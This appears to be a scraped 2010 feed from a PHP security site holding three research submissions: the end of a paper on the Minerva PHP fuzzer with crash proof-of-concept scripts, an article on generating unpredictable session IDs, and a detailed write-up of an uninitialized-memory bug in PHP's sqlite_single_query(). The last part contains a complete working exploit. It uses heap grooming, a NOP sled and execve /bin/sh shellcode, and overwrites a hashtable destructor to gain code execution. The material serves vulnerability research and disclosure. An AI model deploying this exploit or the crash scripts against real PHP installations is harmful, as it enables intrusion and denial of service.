This paragraph presents Minerva results for PHP 5.3.2 and 5.2.13. Testing environment won't be described to encourage future users to experiment with Minerva. Tests presented here were focused on crashing PHP interpreter, if it returned SIGSEGV, the script file was kept for future research. During a few hours of the standard modules testing, the following bugs were discovered:

fnmatch() - stack exhaustion caused by glibc function fnmatch, seems not to be exploitable, but may be used to crash PHP from remote.

Proof of concept code:

  <?php
     $a57 = str_repeat("A",16000000);
     $a265 = fnmatch($a57,"");
  ?>
  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch 0.9.6.2 (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Program received signal SIGSEGV, Segmentation fault.
  0xb7a7bb0b in fnmatch () from /lib/i686/cmov/libc.so.6

Freeing context before freeing stream - During php_request_shutdown() (main/main.c) context structure assigned to stream is freed before stream strucure is freed. If memory which was allocated for context is dirty, then it may cause crash. This bug may be exploitable and needs more research.

Proof of concept:

  <?php
     $blah = fopen('/dev/zero','a');
     $arr = array();
     for ( $i = 0 ; $i < 5000 ; $i++ ) {
       $arr[$i] = "";
     }
     stream_context_get_options($blah);
     $a88 = fread($blah,100000000000);
  ?>
  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch 0.9.6.2 (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 1215752193 bytes) in /thanks/to/dft/test.php on line 8

  Program received signal SIGSEGV, Segmentation fault.
  0x0829ed83 in php_stream_context_del_link ()
  (gdb) bt
  #0  0x0829ed83 in php_stream_context_del_link ()
  #1  0x082a05c1 in _php_stream_free ()

uninitialized memory in sqlite extension - this bug, as well as its exploitation were described in details in article which can be found in doc/sqlite.txt.

-[ 3. Future work

Minerva, for now, is limited to PHP language, but the approach used can bring good results also in case of other scripting languages like Python or Perl, as well as the testing syscalls. Supporting more targets shouldn't be hard, but it requires from Minerva to be more flexible, then Minerva will be possibly redesigned and rewritten to OCaml and will be continued as a long-term project.

In case of PHP there's still much work to do, some modules need to satisfy the conditions like passing valid ftp server in case of ftp module. Minerva now supports only this modules which can be fuzzed without 3rd party software. The second thing is that the project almost ignores the fact that PHP is an object oriented language, random class generator could be a benefit. It may include features like inheritance or overriding.

Some indexes can help to improve the Minerva efficiency. A good option is to measure how much PHP code is covered, it can be done by using gcov [gcov], and than apply some strategies (e.g. evolutionary) to cover more code.

Detecting bugs by waiting for SIGSEGV is a bit naive method, the project can use benefits of -fmudflap or other dynamic analysis tools to uncover more bugs. Research on that field needs to be done in order to increase project
efficiency.

If you would like to help or just you’ve got idea, comment or suggestion, please feel free to contact me.

-[ A. Licence

Minerva project is released under the BEER-WARE license.

THE BEER-WARE LICENSE:
wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return.

Borrowed from http://people.freebsd.org/~phk/

-[ B. Contact

You can reach me at:

MAIL: shm+minerva@digitalsun.pl
IRC: shm@freenode
WEB: http://digitalsun.pl/

-[ C. References:

[miller] http://pages.cs.wisc.edu/~bart/fuzz/Foreword1.html Miller’s site on fuzzing
[pff] http://www.setec.org/~calcite/code/pff/ PHP Fuzzing Framework
[lilxam] http://lilxam.free.fr/repo/hacking/PHP%20buffer%20overflow/PHP_BOF.pdf article in french about PHP fuzzing

-[ D. Further reading material:

http://en.wikipedia.org/wiki/Fuzz_testing briefly about fuzzing
http://pages.cs.wisc.edu/~bart/fuzz/ more on fuzzing
http://bitbucket.org/haypo/fusil/wiki/Home fusil fuzzer, written in Python supporting PHP fuzzing
http://web.archive.org/web/20070807083417/www.digitaldwarf.be/ digital dwarf fuzzers collection
http://events.ccc.de/congress/2005/fahrplan/events/537.en.html Fuzzing – Breaking software in an automated fashion

-[ E. Greetings:

I would like to thank very much following people for their contribution:

  • Katabu for proof-reading and patience
  • Snooty for proof-reading and feedback
  • dft-labs for providing me testing environment

-[ F. Download:

DOWNLOAD Minerva
]]>
http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/feed/ 0
MOPS Submission 04 – Generating Unpredictable Session IDs and Hashes http://php-security.org/2010/05/09/mops-submission-04-generating-unpredictable-session-ids-and-hashes/ http://php-security.org/2010/05/09/mops-submission-04-generating-unpredictable-session-ids-and-hashes/#comments Sun, 09 May 2010 16:34:55 +0000 admin http://php-security.org/?p=204 Today we want to present you the fourth external MOPS submission. It was submitted by Jordi Boggiano and explains how to generate unpredictable session ids and hashes in PHP.

Generating unpredictable session ids and hashes

Jordi Boggiano

It is not uncommon for web developers to have to generate random ids or hashes, for instance large scale project or frameworks may want to implement their own PHP session handlers either completely abstracted in their API, or overloading PHP’s internal API using session_set_save_handler(). If you do so, unless you want to entrust PHP’s core to do it, one thing you will have to take care of is generating unique session ids to send as a cookie to your users, allowing the session to persist. Other common use cases for such unique hashes is to generate CSRF tokens to insert in forms or URLs, and finally authentication tokens for email validation or such.

Common misconceptions and human errors

The most common error programmers do when implementing this is due to the fact that we humans are very bad at judging randomness. Especially once you add a hashing algorithm on top of it, it becomes very quickly impossible to discern whether the hashes you create are indeed unique and random enough or not. To illustrate, here is twice the output of md5(rand(1,5)):

eccbc87e4b5ce2fe28308fd9f2a7baf3
a87ff679a2f3e71d9181a67b7542122c

If you don’t know better and just look at those values, it all seems pretty random, but using this for your session id would basically mean you would have collisions once you get 5 concurrent users, most likely less than that even since two consecutive calls might return the same value.

Most developers have some clue and wouldn’t do such an obvious mistake, but here comes another common mistake: “let’s use time !”. Indeed, time is linear and if you use microtime(true), you will have pretty unique ids and very low chances of collisions unless you have a high load site with multiple servers. However this is very insecure since anyone knows the approximate time of your server, an attacker could then generate hashes for every micro-second and then potentially hijack a session. I won’t go further in details about the ways those attacks work since this is more about securing your site than hijacking sessions.

Another common approach is to use rand(), mt_rand(), or uniqid(). The first two are somewhat random but more sophisticated attacks can also render them quite dangerous to rely upon, while the latter is just based on the time, so it’s not offering any benefits over using microtime().

Randomness explained

The main thing to understand is how random values are generated. Computers are deterministic machines, they are made to be reliable and consistently produce the same output for a given input, therefore asking them to generate anything out of thin air is extremely difficult. To circumvent this, operating systems have ways to get really random values, that are virtually impossible to guess. Those are using entropy (i.e. noise or chaos) generated by the machine’s environment, using an aggregate of various inputs like hard-drive I/O, fan speed, etc.

Two variants are available on most UNIX machines, built as files you can read randomness from, /dev/random is a high quality, locking random number generator, which means what you read from it is erased, so it might be empty and locking your application until it is filled again so you can read from it. This is fine on high load servers but it’s quite dangerous since if it gets empty, new users waiting for a session id will have to wait seconds or the request will completely time out, not quite the first experience you’d want them to have. The other alternative is /dev/urandom, the “unlocked” variant. This one records data and will serve you instantaneously a chunk of it. It is therefore of lesser quality since it will potentially give you similar output twice, but is the best you can get if you can’t rely on /dev/random being fast enough, and it will beat PHP’s mt_rand() any day.

The Windows counterpart is sadly not built as a file anyone can read from, but is available through the OS API. From PHP, you can call it via the COM extension. See the example at the end of this post for more details.

Also as of PHP 5.3.0, the openssl_random_pseudo_bytes provides you with a good algorithm from libssl that returns pseudo-random bytes. Beware if you use it to check for the value of the $strong parameter though, because if it’s not true, it means the algorithm couldn’t use the optimal method in which case you’d better do it yourself.

Hash algorithms

Getting random data is one thing, but then you most likely want to normalize it, which has two benefits: hiding what you used to create the unique id, and making it safe to be stored and passed as a cookie. Leaking random data to the user might hint an attacker as to what method you used to generate it, so it’s better not to. While trying to set a cookie with data that contain weird characters might leave you with corrupted headers or a PHP warning appearing on some pages, making it hard to debug.

For this purpose, PHP offers the hash extension that is enabled by default and available since PHP5.1.2, so that should run on most hosts by now. By executing hash_algos() or via your phpinfo page, you can see what algorithms are supported by your version. There are a lot of algorithms to choose from, and they vary a lot in quality. Some are not designed for cryptographic purposes and therefore are very prone to collision attacks, while some were once great but have been cracked since then. The other criteria used to pick one is the speed at which they run, slow algorithms means an attacker will have to use more processing power in order to brute-force his way in, so you don’t want an algorithm that performs well. There is a benchmark available in the user comments of the hash() function page, which shows, at the time of this writing, that Whirlpool is one of the slowest, and it would be my recommendation since it offers good cryptographic quality on top of it. However, keep an eye out for security advisories. Cryptographic algorithms are permanently under attack and it is not guaranteed that Whirlpool will still be a good choice 5 years from now.

And while it is not really the topic of this article, please note that even though MD5 is very popular, it is not a good idea for password hashing since, due to it’s popularity, many people have built rainbow tables for it.

The final solution, for now..

To summarize, here is a basic implementation that should work provide optimal results on any machine, while working best on UNIX, but until the Windows API is supported by PHP you can’t really do more there.

function generateUniqueId($maxLength = null) {
    $entropy = '';

    // try ssl first
    if (function_exists('openssl_random_pseudo_bytes')) {
        $entropy = openssl_random_pseudo_bytes(64, $strong);
        // skip ssl since it wasn't using the strong algo
        if($strong !== true) {
            $entropy = '';
        }
    }

    // add some basic mt_rand/uniqid combo
    $entropy .= uniqid(mt_rand(), true);

    // try to read from the windows RNG
    if (class_exists('COM')) {
        try {
            $com = new COM('CAPICOM.Utilities.1');
            $entropy .= base64_decode($com->GetRandom(64, 0));
        } catch (Exception $ex) {
        }
    }

    // try to read from the unix RNG
    if (is_readable('/dev/urandom')) {
        $h = fopen('/dev/urandom', 'rb');
        $entropy .= fread($h, 64);
        fclose($h);
    }

    $hash = hash('whirlpool', $entropy);
    if ($maxLength) {
        return substr($hash, 0, $maxLength);
    }
    return $hash;
}

This code takes cares of having decent basic entropy through a combination of uniqid() and mt_rand(), and then adds some more from /dev/urandom, libssl and windows’ API, depending on what is available. Finally it hashes it all with the Whirlpool algorithm and returns that. It also provides you with a maxLength option, that allows you to get shorter hashes, since Whirlpool returns 128 characters long strings, and that might be a bit much if you plan to use it for an URL token. However cutting it means reducing it’s uniqueness so do it with caution.

]]>
http://php-security.org/2010/05/09/mops-submission-04-generating-unpredictable-session-ids-and-hashes/feed/ 1
MOPS Submission 03 – sqlite_single_query(), sqlite_array_query() Uninitialized Memory Usage http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/ http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/#comments Fri, 07 May 2010 11:08:04 +0000 admin http://php-security.org/?p=133 Today we want to present you the third external MOPS submission. It is the first of two submissions sent in by Mateusz Kocielski. This one is a detailed explanation about how to exploit the sqlite_single_query() and sqlite_array_query() uninitialized memory usage.

-[ sqlite_single_query, sqlite_array_query uninitialized memory usage
-[ Mateusz Kocielski, shm+minerva@digitalsun.pl
-[ version: 1.0

Table of contents:

  1. Introduction
  2. Vulnerability
  3. Exploitation
  4. Resources
  5. Code fix
  6. Greetings

-[ 1. Introduction

PHP [php] is a very popular, object-oriented scripting language, mostly used for web development to produce dynamic pages, its processor is supported by most of the modern web platforms.

This article describes uninitialized memory usage bug in one of the standard modules. This bug was uncovered by Minerva fuzzer [minerva]. Document covers detailed description of the bug and a brief journey through PHP internals in order to exploit this vulnerability.

-[ 2. Vulnerability

Bug appears in sqlite_single_query() [sq_sq] and sqlite_array_query() [sq_aq] functions of the sqlite module [sqlite]. Functions are defined in ext/sqlite/sqlite.c file [sqlite.c]. We’ll consider only sqlite_single_query() function, because the bug in the second case is similar.

-[ 2.1 Vulnerable code

Vulnerable code looks as follows:

source: ext/sqlite/sqlite.c

/* {{{ proto array sqlite_single_query(resource db, string query [, bool
first_row_only [, bool decode_binary]])
Executes a query and returns either an array for one single column or the
value of the first row. */


PHP_FUNCTION(sqlite_single_query)
{
       ...
   struct php_sqlite_result *rres;
   ...
       rres = (struct php_sqlite_result *)emalloc(sizeof(*rres)); [1]
       sqlite_query(NULL, db, sql, sql_len, PHPSQLITE_NUM, 0, NULL, &rres, NULL
       TSRMLS_CC); [2]
   ...
       real_result_dtor(rres TSRMLS_CC); [3]
}

The problem is that the allocated resource rres in [1] is not being initialized (i.e. zeroed) by [2]. If query is empty, it may lead to pass to real_result_dtor “dirty” memory [3].

source: ext/sqlite/sqlite.c

static void real_result_dtor(struct php_sqlite_result *res TSRMLS_DC)
{
       int i, j, base;

       if (res->vm) {
               sqlite_finalize(res->vm, NULL);
       }

       if (res->table) {
               if (!res->buffered && res->nrows) {
                       res->nrows = 1; /* only one row is stored */
               }
               for (i = 0; i < res->nrows; i++) {
                       base = i * res->ncolumns;
                       for (j = 0; j < res->ncolumns; j++) {
                               if (res->table[base + j] != NULL) {
                                       efree(res->table[base + j]);
                               }
                       }
               }
               efree(res->table); [1]
       }

       if (res->col_names) {
               for (j = 0; j < res->ncolumns; j++) {
                       efree(res->col_names[j]);
               }
               efree(res->col_names); [2]
       }

   ...

       efree(res);
}

If somehow res passed to real_result_dtor can be controlled, then it could lead to double free. Which in fact can be easily exploitable, for more details in that area look at exploit archive of the MOPB-2007 [mopb].

-[ 3. Exploitation

This paragraph discuss the material needed to understand how the exploit provided is working. Presented technique can be reused in all cases where attacker can control argument passed to efree() function.

The goal is to play out the following steps:

  1. Control memory allocated as rres in sqlite_single_query.
  2. Using real_result_dtor free memory in area which can be controlled by an attacker.
  3. Allocate hashtable structure in the controlled area.
  4. Replace hashtable destructor with pointer to the shellcode.
  5. Trigger the destructor.

-[ 3.1. PHP memory management

PHP has got own memory management (mm) implementation, developers introduced mm functions in Zend/zend_alloc.c file.

source: zend_alloc.c

static void *_zend_mm_alloc_int(zend_mm_heap *heap, size_t size
   ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) /* {{{ */
{
       zend_mm_free_block *best_fit;
       size_t true_size = ZEND_MM_TRUE_SIZE(size);
       ...

       if (EXPECTED(ZEND_MM_SMALL_SIZE(true_size))) {
               size_t index = ZEND_MM_BUCKET_INDEX(true_size);
               ...
#if ZEND_MM_CACHE
               if (EXPECTED(heap->cache[index] != NULL)) {
                       /* Get block from cache */
                       ...
                       best_fit = heap->cache[index];
                       heap->cache[index] = best_fit->prev_free_block;
                       heap->cached -= true_size;
                       ...
                       return ZEND_MM_DATA_OF(best_fit);
               }
...
static void _zend_mm_free_int(zend_mm_heap *heap, void *p
   ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) /* {{{ */
{
       zend_mm_block *mm_block;
       zend_mm_block *next_block;
       size_t size;

       if (!ZEND_MM_VALID_PTR(p)) {
               return;
       }
       mm_block = ZEND_MM_HEADER_OF(p);
       size = ZEND_MM_BLOCK_SIZE(mm_block);
...
       if (EXPECTED(ZEND_MM_SMALL_SIZE(size)) && EXPECTED(heap->cached
             < ZEND_MM_CACHE_SIZE)) {
               size_t index = ZEND_MM_BUCKET_INDEX(size);
               zend_mm_free_block **cache = &heap->cache[index];

               ((zend_mm_free_block*)mm_block)->prev_free_block = *cache;
               *cache = (zend_mm_free_block*)mm_block;
               ...
               return;
       }
...

PHP mm implementation is caching small blocks in buckets identified by the block size. Cache buckets are organized as FIFO (First input, first output) queues. _zend_mm_free_int and _zend_mm_alloc_int are called directly by emalloc and efree function. We can try to inject block to cache buckets which will be used in future. This can be done by passing a pointer to efree function, which points to area of memory which can be modified by an attacker. In order to do that, "fake" zend_mm_block should be stored and its address should be passed.

source: Zend/zend_alloc.c

typedef struct _zend_mm_block_info {
#if ZEND_MM_COOKIES
       size_t _cookie;
#endif
       size_t _size;
       size_t _prev;
} zend_mm_block_info;

typedef struct _zend_mm_block {
       zend_mm_block_info info;
#if ZEND_DEBUG
       unsigned int magic;
# ifdef ZTS
       THREAD_T thread_id;
# endif
       zend_mm_debug_info debug;
#elif ZEND_MM_HEAP_PROTECTION
       zend_mm_debug_info debug;
#endif
} zend_mm_block;

-[ 3.2. Controlling memory allocated as rres

Controlling rres could be used to do something nasty, but how it could be controlled in order to pass to efree crafted address? rres is php_sqlite_result type, which has got the following definition:

source: ext/sqlite/sqlite.c

struct php_sqlite_result {
       struct php_sqlite_db *db;
       sqlite_vm *vm;
       int buffered;
       int ncolumns;
       int nrows;
       int curr_row;
       char **col_names;
       int alloc_rows;
       int mode;
       char **table;
};

Its size is 40 bytes on 32-bit machine, according to previous sub-paragraph, emalloc will try to use a block from the buckets. Obvious way to control rres is to push own memory into bucket just before sqlite_single_query call. One way to do it is call str_repeat function:

$ cat test.php
<?php
$dh = sqlite_popen("/tmp/whatever");
str_repeat("A",39); // +1 byte for \x00
$dummy = sqlite_single_query($dh," "); // trigger the bug
?>
$ gdb ./php
...
(gdb) r test.php
...
Program received signal SIGSEGV, Segmentation fault.
sqliteVdbeFinalize (p=0x41414141, pzErrMsg=0x0)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/libsqlite/src/vdbeaux.c:924
924       if( p->magic!=VDBE_MAGIC_RUN && p->magic!=VDBE_MAGIC_HALT ){
(gdb) bt
#0  sqliteVdbeFinalize (p=0x41414141, pzErrMsg=0x0)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/libsqlite/src/vdbeaux.c:924
#1  0x081d2d52 in real_result_dtor (res=0x86f5fec)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/sqlite.c:695
#2  0x081d3cb8 in zif_sqlite_single_query (ht=2, return_value=0x86f5fd0,
   return_value_ptr=0x0, this_ptr=0x0, return_value_used=1)
   at /home/shm/projekty/security/src/php-5.3.2/ext/sqlite/sqlite.c:2660
...
(gdb) x/10x 0x86f5fec
0x86f5fec:      0x00000000      0x41414141      0x41414141      0x41414141
0x86f5ffc:      0x41414141      0x41414141      0x41414141      0x41414141
0x86f600c:      0x41414141      0x00414141
(gdb)

As we can see, most of values in php_sqlite_result struct can be controlled.

-[ 3.3 Hashtables

Hash tables has got pointer to its destructor in PHP, this can be used to jump to shellcode. Hashtable struct looks as follows:

source: Zend/zend_hash.h

typedef struct _hashtable {
       uint nTableSize;
       uint nTableMask;
       uint nNumOfElements;
       ulong nNextFreeElement;
       Bucket *pInternalPointer;
       Bucket *pListHead;
       Bucket *pListTail;
       Bucket **arBuckets;
       dtor_func_t pDestructor;
       zend_bool persistent;
       zend_bool unicode;
       unsigned char nApplyCount;
       zend_bool bApplyProtection;
#if ZEND_DEBUG
       int inconsistent;
#endif
} HashTable;

Length of this structure is 41 bytes. Replacing value can be done by pushing 41 byte block into cache buckets and try to allocate this block for hashtable structure. pDestructor can be triggered by using unset() function.

-[ 3.4 Exploit

Previous paragraphs omit description of Linux security features i.e. ASLR, presented exploit is written to bypass those protections. For further information take a look at the comments. Exploit was successfully used against php-5.3.2 and php-5.2.13 on Linux 2.6.

source: exploit.php

<?php

/* sqlite_single_query exploit for php-5.3.2
 * discovered and exploited   by  digitalsun
 *
 * e-mail  : ds@digitalsun.pl
 * website : http://www.digitalsun.pl/
 */


/* DEFINE */

define('EVIL_SPACE_ADDR', 0xb6f00000);
define('EVIL_SPACE_SIZE', 1024*1024);

$SHELLCODE =
"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Initialize */
$sqh = sqlite_popen("/tmp/whatever");

/* allocate memory for evil table */
$EVIL_TABLE = str_repeat("\x31\x00\x00\x00", EVIL_SPACE_SIZE);
/* allocate memory for shellcode  */
$CODE = str_repeat("\x90\x90\x90\x90", EVIL_SPACE_SIZE);

for ( $i = 0, $j = EVIL_SPACE_SIZE*4 - strlen($SHELLCODE) - 1 ;
        $i < strlen($SHELLCODE) ; $i++, $j++ ) {
    $CODE[$j] = $SHELLCODE[$i];
}

$rres =
/* struct php_sqlite_result {        */
/*         struct php_sqlite_db *db; */ "AAAA" .
/*         sqlite_vm *vm;            */ "\x00\x00\x00\x00"         .
/*         int buffered;             */ "\x00\x00\x00\x00"         .
/*         int ncolumns;             */ "\x00\x00\x00\x00"         .
/*         int nrows;                */ "\x00\x00\x00\x00"         .
/*         int curr_row;             */ "\x00\x00\x00\x00"         .
/*         char **col_names;         */ pack('L', EVIL_SPACE_ADDR) .
/*         int alloc_rows;           */ "\x00\x00\x00\x00"         .
/*         int mode;                 */ "\x00\x00\x00\x00"         .
/*         char **table;             */ "\x00\x00\x00"             ; // + one byte for \x00
/* };*/

str_repeat($rres,1);
$dummy = sqlite_single_query($sqh," ");

/* get hash table */
$array = array(array());

/* find hash table */

$hash_table_offset = NULL;

for ( $i = 0 ; $i < strlen($EVIL_TABLE) ; $i+=4 )
{
    if ( $EVIL_TABLE[$i] != "\x31" ) {
        $hash_table_offset = $i;
        break;
    }
}

if ( is_null($hash_table_offset) )
    die("[-] Couldn't find hash table, exiting.");
else
{
    printf("[+] hashtable found @ 0x%08x\n", $hash_table_offset);
}

/* change the destructor */
$shellcode_addr = EVIL_SPACE_ADDR-EVIL_SPACE_SIZE*4-$hash_table_offset;
printf("[+] guessed shellcode address: 0x%08x\n", $shellcode_addr);
$shellcode_addr = pack('L', $shellcode_addr);

$EVIL_TABLE[$hash_table_offset+8*4+3] = $shellcode_addr[3];
$EVIL_TABLE[$hash_table_offset+8*4+2] = $shellcode_addr[2];
$EVIL_TABLE[$hash_table_offset+8*4+1] = $shellcode_addr[1];
$EVIL_TABLE[$hash_table_offset+8*4+0] = $shellcode_addr[0];

printf("[+] jumping to the shellcode\n");
/* trigger the destructor */
unset($array);


die('[-] failed ;[');
?>
$ ./php -v
PHP 5.3.2 (cli) (built: Mar 29 2010 13:35:08)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ ./php exploit.php
[+] hashtable found @ 0x00158fe8
[+] guessed shellcode address: 0xb69a7018
[+] jumping to the shellcode
Hello, World!
...

-[ 4. Resources

[minerva] Will be filled in next week Minerva PHP Fuzzer
[mopb] http://www.php-security.org/MOPB/ Month of PHP bugs, 2007
[php] http://www.php.net/ PHP homepage
[sl_aq] http://www.php.net/manual/en/function.sqlite-array-query.php sqlite_array_query() documentation
[sl_sq] http://www.php.net/manual/en/function.sqlite-single-query.php sqlite_single_query() documentation
[suoshin] http://www.hardened-php.net/suhosin/a_feature_list.html Suhosin feature list
[sqlite] http://www.php.net/manual/en/book.sqlite.php sqlite module documentation
[sqlite.c] http://lxr.php.net/source/php-src/ext/sqlite/sqlite.c sqlite module sources

-[ 5. Code fix

One of possible fix is to use ecalloc instead of emalloc in vulnerable functions.

-[ 6. Greetings

I would like to thank the following people for their contribution into my work:

  • Katabu for proof-reading and a big amount of patience
  • Snooty for proof-reading and feedback
  • dft-labs for providing me testing environment
]]>
http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/feed/ 0